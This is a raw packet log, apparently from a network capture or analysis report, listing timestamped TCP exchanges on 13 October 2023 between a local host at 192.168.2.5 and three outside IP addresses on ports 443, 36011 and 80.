Oct 13, 2023 15:21:16.570417881 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.570447922 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.570455074 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.570468903 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.570496082 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.572257996 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.572277069 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.572309017 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.572316885 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.572341919 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.572352886 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.573916912 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.573936939 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.573966980 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.573973894 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.573988914 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.574014902 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.575972080 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.576000929 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.576024055 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.576031923 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.576056957 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.576067924 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.578356028 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.578372002 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.578408003 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.578416109 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.578435898 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.578448057 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.580380917 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.580399036 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.580434084 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.580447912 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.580463886 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.580492973 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.583781004 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.583798885 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.583831072 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.583838940 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.583856106 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.583903074 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.586862087 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.586879969 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.586920023 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.586927891 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.586945057 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.586977005 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.590200901 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.590219975 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.590267897 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.590276003 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.590289116 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.590313911 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.592339039 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.592361927 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.592392921 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.592401028 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.592417955 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.592434883 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.594283104 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.594304085 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.594343901 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.594351053 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.594363928 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.594391108 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.596424103 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.596455097 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.596472025 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.596479893 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.596508980 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.596525908 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.598848104 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.598865032 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.598898888 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.598906994 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.598921061 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.598951101 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.600894928 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.600913048 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.600941896 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.600950956 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.600965023 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.600990057 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.602919102 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.602937937 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.602969885 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.602977991 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.603003025 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.603038073 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.604598999 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.604617119 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.604669094 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.604677916 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.604691982 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.604718924 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.606458902 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.606477022 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.606511116 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.606518984 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.606534004 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.606559038 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.608272076 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.608290911 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.608319998 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.608329058 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.608354092 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.608365059 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.610136986 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.610156059 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.610192060 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.610199928 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.610213995 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.610243082 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.612068892 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.612087965 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.612128019 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.612135887 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.612150908 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.612174034 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.613990068 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.614008904 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.614041090 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.614051104 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.614068031 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.614097118 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.618915081 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.618932962 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.619071007 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.619071007 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.619102955 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.619144917 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.621274948 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.621293068 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.621331930 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.621365070 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.621385098 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.621401072 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.654125929 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.654145002 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.654288054 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.654288054 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.654320955 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.654371023 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.774138927 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:16.774339914 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:16.774939060 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:16.775118113 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:16.775408030 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:16.775583982 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:16.775595903 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:16.775767088 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:16.776005030 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:16.776079893 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:16.776262999 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:16.776346922 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:16.810153961 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.810173035 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.810384989 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.810404062 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.810420990 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.810446024 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.810467958 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.810482025 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.810528994 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.810581923 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.810633898 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.810687065 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.810715914 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.810802937 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.810852051 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.810898066 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.810915947 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.810957909 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.810977936 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.811036110 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.811079025 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.811105013 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.811225891 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.811264992 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.811266899 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.811333895 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.811373949 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.811397076 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.811444998 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.811480999 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.811541080 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.811667919 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.811685085 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.811703920 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.811775923 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.811810017 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.811815977 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.811846018 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.811880112 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.811923027 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.811969995 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.812005997 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.812026024 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.812097073 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.812133074 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.812170982 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.812289000 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.812325954 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.812411070 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.812463045 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.812504053 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.812541962 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.812643051 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.812680960 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.812705994 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.812724113 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.812760115 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.812786102 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.812839985 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.812886000 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.812923908 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.813002110 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.813036919 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.813124895 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.813193083 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.813227892 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.813246012 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.813277006 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.813311100 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.813410997 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.813487053 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.813523054 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.813582897 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.813682079 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.813719988 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.813795090 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.813880920 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.813919067 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.813957930 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.814210892 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.814248085 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.814291000 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.814371109 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.814409018 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.814421892 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.814512968 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.814553976 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.814625025 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.814677000 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.814719915 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.814730883 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.814790010 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.814826965 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.814886093 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.814902067 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.814934969 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.814937115 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.815010071 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.815045118 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.815052032 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.815131903 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.815148115 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.815171957 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.815232992 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.815248966 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.815269947 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.815310001 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.815346003 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.815361023 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.815424919 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.815459967 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.815474033 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.815538883 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.815574884 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.815614939 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.815814018 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.815850973 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.815936089 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.816019058 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.816061974 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.816133022 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.816227913 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.816262960 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.816286087 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.816349983 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.816384077 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.816437960 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.816529036 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.816564083 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.816589117 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.816663980 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.816699028 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.816724062 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.816740990 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.816776037 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.816816092 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.816864967 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.816900015 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.816912889 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.816961050 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.816993952 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.817018986 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.817048073 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.817081928 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.817123890 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.817190886 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.817223072 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.817256927 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.817306042 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.817338943 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.817395926 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.817456007 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.817488909 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.817511082 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.817527056 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.817559958 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.817596912 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.817646027 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.817678928 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.817733049 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.817749023 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.817780972 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.817820072 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.817846060 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.817878962 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.817904949 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.817982912 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.818015099 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.818053961 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.818150997 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.818185091 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.818208933 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.818284988 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.818320036 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.818358898 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.818438053 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.818470955 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.818490028 CEST	80	49741	171.22.28.219	192.168.2.5
